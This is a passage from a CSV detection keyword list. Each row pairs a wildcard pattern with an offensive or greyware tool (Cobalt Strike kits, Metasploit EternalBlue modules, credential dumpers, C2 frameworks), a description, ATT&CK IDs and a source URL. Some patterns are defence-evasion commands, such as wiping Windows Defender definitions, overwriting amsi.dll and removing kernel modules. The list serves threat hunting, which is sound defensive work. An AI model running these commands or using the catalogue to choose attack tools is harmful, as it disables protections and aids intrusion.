Tools,https://github.com/drk1wi/Modlishka,1,1,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*Modlishka-windows-*-amd64.exe*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,1,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*modprobe -r*,greyware_tool_keyword,modproble,Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. 
This rule identifies attempts to remove a kernel module.,T1547.006 - T1070.006,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*modprobe --remove*,greyware_tool_keyword,modproble,Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.,T1547.006 - T1070.006,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*modprobe rmmod -r*,greyware_tool_keyword,modproble,Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. 
This rule identifies attempts to remove a kernel module.,T1547.006 - T1070.006,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*module inject *,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,0,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*modules*daclread.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*modules/enumrate.py*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*modules/exploits/*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*modules/exploits/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*mogwailabs*,offensive_tool_keyword,Github Username,MOGWAI LABS is an infosec boutique with a strong emphasis on offensive security github repo hosting offensive tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/mogwailabs,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*mojo.5688.8052.183894939787088877##*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,pipe name,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*mojo.5688.8052.35780273329370473##*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,pipe name,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*mojo_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 
- T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z
-*monero2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*money2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*mongodb2john.js*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*Monkey Island v*_windows.exe*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,0,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*monkey*tunnel.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z 
-*monkey\infection_monkey*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*monkey_island.exe*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*monkey32.exe *,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,0,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*monkey64.exe *,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,0,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*monkey-linux-32*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*monkey-linux-64*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*monkey-windows-32.exe*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*monkey-windows-64.exe*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation 
tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*monoxgas/sRDI*,offensive_tool_keyword,sRDI,Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/monoxgas/sRDI,1,1,N/A,N/A,10,1855,445,2022-12-14T16:01:43Z,2017-07-28T19:30:53Z
-*moonD4rk/HackBrowserData*,offensive_tool_keyword,cobaltstrike,C# binary with embeded golang hack-browser-data,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData,1,1,N/A,10,10,84,15,2021-12-09T18:58:27Z,2020-12-06T12:28:47Z
-*MooseDojo*,offensive_tool_keyword,Github Username,github repo that was hosting exploitation tools. 
may be used by other exploitation tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/MooseDojo,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*morphHTA*,offensive_tool_keyword,morphHTA,morphHTA - Morphing Cobalt Strikes evil.HTA payload generator,T1059.007 - T1027.002 - T1564.001 - T1547.001,TA0002 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/vysecurity/morphHTA,1,1,N/A,N/A,6,503,142,2023-04-14T19:15:57Z,2017-02-24T11:27:00Z
-*mortar-main.zip*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,1,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z
-*mosquitto2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*Mount-VolumeShadowCopy*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*mousejack*,offensive_tool_keyword,mousejack,MouseJack device discovery and research tools,T1179 - T1059 - T1065 - T1057,TA0011 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/BastilleResearch/mousejack,1,1,N/A,N/A,10,1203,255,2017-12-19T10:16:25Z,2016-02-23T14:19:38Z
-*mouseshaker.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z
-*movefile64.exe /nobanner *.dll C:\Windows\System32\amsi.dll*,greyware_tool_keyword,movefile64.exe,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin,1,0,N/A,10,8,N/A,N/A,N/A,N/A
-*MoveKit-master.zip*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral 
Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z
-*move-msbuild * http move.csproj*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z
-*move-pre-custom-file *.exe *,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z
-*movfuscator*,offensive_tool_keyword,movfuscator,The M/o/Vfuscator (short 'o. sounds like mobfuscator) compiles programs into mov instructions. and only mov instructions. Arithmetic. comparisons. jumps. function calls. and everything else a program needs are all performed through mov operations. there is no self-modifying code. no transport-triggered calculation. and no other form of non-mov cheating,T1057 - T1027 - T1059,TA0002 - TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/xoreaxeaxeax/movfuscator,1,0,N/A,N/A,10,8639,392,2023-03-04T21:15:10Z,2015-06-16T01:49:40Z
-*Mozilla/5.0 (*-bit) dnstwist*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,1,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z
-*mozilla2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*mozlz4-win32.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z
-*mpcaainmfjjigeicjnlkdfajbioopjko*,greyware_tool_keyword,VPN Unlimited Free,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*MpCmdRun.exe -RemoveDefinitions -All*,greyware_tool_keyword,MpCmdRun,Wipe currently stored definitions,T1562.004 - T1070.004,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A
-*MpCmdRun.exe* -disable*,greyware_tool_keyword,MpCmdRun,Defense evasion technique disable windows defender,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A
-*MpCmdRun.exe* -RemoveDefinitions -All*,offensive_tool_keyword,MpCmdRun,Removing all the signature from windows defender - used by a metasploit module,T1562.001,TA0040,N/A,N/A,Defense Evasion,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A 
-*mpgn/BackupOperatorToDA*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z
-*mqtt_check.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*mr.un1k0d3r@gmail.com*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z
-*Mr-B0b/SpaceRunner*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,1,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z
-*Mr-Cyb3rgh0st/Excel-Exploit*,offensive_tool_keyword,Excel-Exploit,MacroExploit use in excel sheet,T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main,1,1,N/A,N/A,1,21,4,2023-06-12T11:47:52Z,2023-06-12T11:46:53Z
-*mrd0x/BITB*,offensive_tool_keyword,bitb,Browser templates for Browser In The Browser (BITB) attack,T1056.001 - T1134 - T1090,TA0005 - TA0006 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/mrd0x/BITB,1,1,N/A,10,10,2645,463,2023-07-11T04:57:46Z,2022-03-15T16:51:39Z
-*mremoteng_decrypt.py*,offensive_tool_keyword,mRemoteNG-Decrypt,Python script to decrypt passwords stored by mRemoteNG,T1589 T1003 T1563 T1552 T1098 T1021,N/A,N/A,N/A,Credential Access,https://github.com/haseebT/mRemoteNG-Decrypt,1,1,N/A,N/A,2,111,39,2023-07-06T16:15:20Z,2019-05-27T05:25:57Z
-*mRemoteNG-local.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z
-*MrEmpy/Reaper*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,1,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z
-*Mr-Un1k0d3r*,offensive_tool_keyword,Github Username,github username Mostly Red Team tools for penetration testing. Twitter - @MrUn1k0d3r,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/Mr-Un1k0d3r,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*ms_teams_exports_usernev_dll.txt*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z
-*ms04_007_killbill.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*ms14-068.py -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*ms14-068.py -u*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*ms14-068_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*ms17_010_eternalblue*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. 
payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*ms17_010_eternalblue.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*ms17_010_psexec*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*ms17_010_psexec.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
